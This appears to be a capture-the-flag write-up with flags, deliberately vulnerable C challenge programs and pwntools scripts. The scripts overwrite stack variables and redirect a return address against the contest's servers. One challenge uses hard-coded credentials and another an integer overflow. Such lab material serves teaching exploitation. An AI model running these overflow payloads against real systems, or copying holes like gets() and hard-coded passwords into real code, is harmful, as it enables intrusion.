Flag: WH2024{netcat_is_easy}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define FLAGSIZE 64
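/*
 * Print the first line of flag.txt (at most FLAGSIZE - 1 bytes) to stdout.
 *
 * If the file cannot be opened, a diagnostic is printed and the process
 * exits with status 0, as in the original challenge.
 */
void print_flag(void)
{
    /* Zero-filled so an empty file prints nothing instead of stack garbage. */
    char flag[FLAGSIZE] = {0};
    FILE *f = fopen("flag.txt", "r");

    if (f == NULL) {
        printf("Flag File is Missing.\n");
        exit(0);
    }

    /* After a read error the buffer contents are indeterminate; reset them. */
    if (fgets(flag, FLAGSIZE, f) == NULL) {
        flag[0] = '\0';
    }
    fclose(f);

    /*
     * The file contents are data, not a format string: printf(flag) would
     * interpret any '%' in the file as a conversion specifier.
     */
    fputs(flag, stdout);
}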
/*
 * Ask for a login and a password on stdin and print the flag when both match
 * the values compiled into the program.
 *
 * Both expected strings are literals in this function, so anyone who can read
 * the source or the binary can recover them.
 */
int main(int argc, char** argv) {
    char buffer[32] = {0x00};

    /* Unbuffered stdout: the prompts appear although they end without '\n'. */
    setvbuf(stdout, NULL, _IONBF, 0);

    fputs("Login: ", stdout);
    fgets(buffer, sizeof(buffer), stdin);
    /* fgets keeps the newline, hence the "\n" in the expected strings. */
    if (strcmp(buffer, "Weje\n") != 0) {
        puts("Invalid Username.");
        return 0;
    }

    fputs("Password: ", stdout);
    fgets(buffer, sizeof(buffer), stdin);
    if (strcmp(buffer, "P@SSW0RD\n") != 0) {
        puts("Invalid password!");
        return 0;
    }

    puts("Login passed! Here is your flag.");
    print_flag();
    return 0;
}
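The source shows the 2 values we need to input: the login Weje
and the password P@SSW0RD. Both are hard-coded string literals, so anyone who can read the source or the binary can recover them.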
Flag: WH2024{L0g1n_successf00l}
Used CyberChef to swap endianness
Flag: WH2024{D0nt_c4ll_m3_litt1e}
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#define FLAGSIZE 64
char flag[FLAGSIZE];
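/*
 * Read the first line of flag.txt into the file-scope `flag` buffer and
 * print it to stdout.
 *
 * If the file cannot be opened, a diagnostic is printed and the process
 * exits with status 0.
 */
void win(void)
{
    FILE *f = fopen("flag.txt", "r");

    if (f == NULL) {
        printf("Flag File is Missing.\n");
        exit(0);
    }

    /* After a read error the buffer contents are indeterminate; reset them. */
    if (fgets(flag, FLAGSIZE, f) == NULL) {
        flag[0] = '\0';
    }
    fclose(f);

    /* Print as data: printf(flag) would treat any '%' in the file as a conversion. */
    fputs(flag, stdout);
}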
/*
 * Deliberately vulnerable stack-overflow exercise: reads one line with gets()
 * into a 64-byte buffer and calls win() when `target` is no longer 0.
 */
int main(int argc, char **argv){
    /* _IONBF switches stdout to unbuffered mode, so prompts are written immediately. */
    setvbuf(stdout, NULL, _IONBF, 0);
    /* volatile: target is re-read from memory at every use below. */
    volatile int target;
    /* 64 bytes, zero-filled: room for 63 characters plus the terminating NUL. */
    char buffer[64] = {0x00};
    target = 0;
    printf("Target is currently set to %d, overflow buffer and change 'target'!\n", target);
    printf("Gimme input: ");
    /*
     * gets() takes no length argument, so input longer than 63 characters is
     * written past the end of buffer. The function was removed in C11;
     * fgets(buffer, sizeof buffer, stdin) is the bounded replacement.
     * NOTE(review): whether `target` sits directly behind `buffer` is decided
     * by the compiler's stack layout - confirm against the built binary.
     */
    gets(buffer);
    if (target != 0) {
        printf("You have changed the 'target' variable!\n");
        win();
    } else {
        printf("Nope, target is still %d\n", target);
    }
}
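Simple variable overwrite: gets() does not limit the input length, so bytes sent after the 64 that fill buffer can land in target: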
from pwn import *
# Only report pwntools errors; hide the connection chatter.
context.log_level = 'error'

# 64 filler bytes occupy `buffer` exactly. gets() keeps writing after that, so
# the next four bytes (little-endian 1) are stored past its end; the program
# only checks that target != 0.
filler = b'A' * 64
new_target = b'\x01\x00\x00\x00'

conn = remote('ctf.whitehats.site', 14004)
conn.sendline(filler + new_target)
# Hand the session to the terminal so the program's reply can be read.
conn.interactive()
Flag: WH2024{Im_1337_hakkerman_lmao}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define FLAGSIZE 64
char flag[FLAGSIZE];
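/*
 * Read the first line of flag.txt into the file-scope `flag` buffer and
 * print it to stdout.
 *
 * If the file cannot be opened, a diagnostic is printed and the process
 * exits with status 0.
 */
void win(void)
{
    FILE *f = fopen("flag.txt", "r");

    if (f == NULL) {
        printf("Flag File is Missing.\n");
        exit(0);
    }

    /* After a read error the buffer contents are indeterminate; reset them. */
    if (fgets(flag, FLAGSIZE, f) == NULL) {
        flag[0] = '\0';
    }
    fclose(f);

    /* Print as data: printf(flag) would treat any '%' in the file as a conversion. */
    fputs(flag, stdout);
}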
/*
 * Deliberately vulnerable exercise: reads a line into a 64-byte buffer using
 * a 69-byte limit, echoes buf and val, and calls win() only when val equals
 * 0xdeadbeef. Otherwise it prints "Nope." and exits with status 1.
 */
void vulnerable() {
    /* volatile: val is re-read from memory at every use below. */
    volatile long val = 0x12345678;
    char buf[64] = {0x00};
    printf("The flag can only be touched when val is altered, you can never figure it out!\n");
    /*
     * The size argument (69) is larger than buf (64): fgets may store up to
     * 68 input bytes plus the terminating NUL, i.e. up to 5 bytes past the
     * end of buf. sizeof(buf) would be the correct bound.
     * NOTE(review): whether `val` sits directly behind `buf` is decided by
     * the compiler's stack layout - confirm against the built binary.
     */
    fgets(buf, 69, stdin);
    printf("buf: %s\n",buf);
    /* NOTE(review): val is a long but %x expects unsigned int; %lx would match the type. */
    printf("val: 0x%08x\n",val);
    if (val == 0xdeadbeef)
        win();
    else {
        printf("Nope.");
        exit(1);
    }
    return;
}
/* Entry point: make stdout unbuffered, then run the exercise once. */
int main() {
    /* _IONBF disables buffering, so every message is written immediately. */
    (void)setvbuf(stdout, NULL, _IONBF, 0);

    vulnerable();

    return 0;
}
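Another simple variable overwrite: fgets(buf, 69, stdin) accepts more bytes than the 64-byte buf holds, so the extra four can replace val: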
from pwn import *
# Only report pwntools errors; hide the connection chatter.
context.log_level = 'error'

# 64 filler bytes occupy `buf` exactly. The program's fgets() limit of 69 lets
# four more bytes through; p32() packs the value vulnerable() compares against.
filler = b'A' * 64
wanted_val = p32(0xdeadbeef)

conn = remote('ctf.whitehats.site', 14005)
conn.sendline(filler + wanted_val)
# Hand the session to the terminal so the program's reply can be read.
conn.interactive()
Flag: WH2024{H0w_d1d_you_f1gur3_i+_0ut!?}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define FLAGSIZE 64
char flag[FLAGSIZE];
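/*
 * Read the first line of flag.txt into the file-scope `flag` buffer and
 * print it to stdout followed by a newline.
 *
 * If the file cannot be opened, a diagnostic is printed and the process
 * exits with status 0.
 */
void secret(void)
{
    FILE *f = fopen("flag.txt", "r");

    if (f == NULL) {
        printf("Flag File is Missing.\n");
        exit(0);
    }

    /* After a read error the buffer contents are indeterminate; reset them. */
    if (fgets(flag, FLAGSIZE, f) == NULL) {
        flag[0] = '\0';
    }
    /* The stream is no longer needed; close it instead of leaking it. */
    fclose(f);

    printf("%s\n", flag);
}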
/*
 * Deliberately vulnerable exercise: reads one line with gets() into a
 * 64-byte stack buffer, prints a fixed message and returns.
 */
void vulnerable() {
    char buf[64] = {0x00};
    /*
     * gets() takes no length argument, so input longer than 63 characters is
     * written past the end of buf and into whatever the compiler placed
     * behind it on the stack. The function was removed in C11;
     * fgets(buf, sizeof buf, stdin) is the bounded replacement.
     */
    gets(buf);
    puts("Maybe you will find it next time");
    return;
}
/* Entry point: make stdout unbuffered, print the banner, run the exercise. */
int main() {
    /* _IONBF disables buffering, so every message is written immediately. */
    (void)setvbuf(stdout, NULL, _IONBF, 0);

    puts("Hidden in me is a function that leads you to the flag, can you find it?");
    vulnerable();

    return 0;
}
Used ropper to get the address of ret
and the address of win (the function is named secret in the source above)
, then played around with the offset until it was correct. Since something's wrong with the server, the flag only shows 6% of the time, so the exploit is in a while loop.
from pwn import *
# Only report pwntools errors; hide the connection chatter.
context.log_level = 'error'

# Values from the write-up: the offset was found by trial and the two
# addresses with ropper. `win` is presumably the address of secret() in the
# source; confirm against the binary.
offset = 68
ret = 0x0804900a
win = 0x080491b2

# The payload is identical on every attempt, so it is built once.
payload = b'A' * offset + p32(win) + p32(ret)

# The write-up reports that the flag is printed on only 6% of attempts,
# so the attempt is repeated until a line containing the flag prefix arrives.
while True:
    conn = remote('ctf2.whitehats.site', 2008)
    conn.sendline(payload)
    conn.recvuntil(b'Maybe you will find it next time\n')
    try:
        line = conn.recvline().decode()
        if 'WH2024' in line:
            print(line)
            break
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt, and the
        # connection is never closed before the next attempt.
        pass
Flag: WH2024{1m_h1dd3n_in_s3cret}
The program shows a menu with choices to use money and check money. I realised it is possibly an integer overflow.
I cannot buy the flag; I need more money. I tried playing around with what I can withdraw.
Looks like I got something using a number bigger than INT_MAX.
Let me try to buy a flag with this.
It still does not work.
I restarted it and used INT_MAX + 10000 to withdraw:
Flag: WH2024{st0nk1ng_w17H_v0uch3r_0verfl0wS}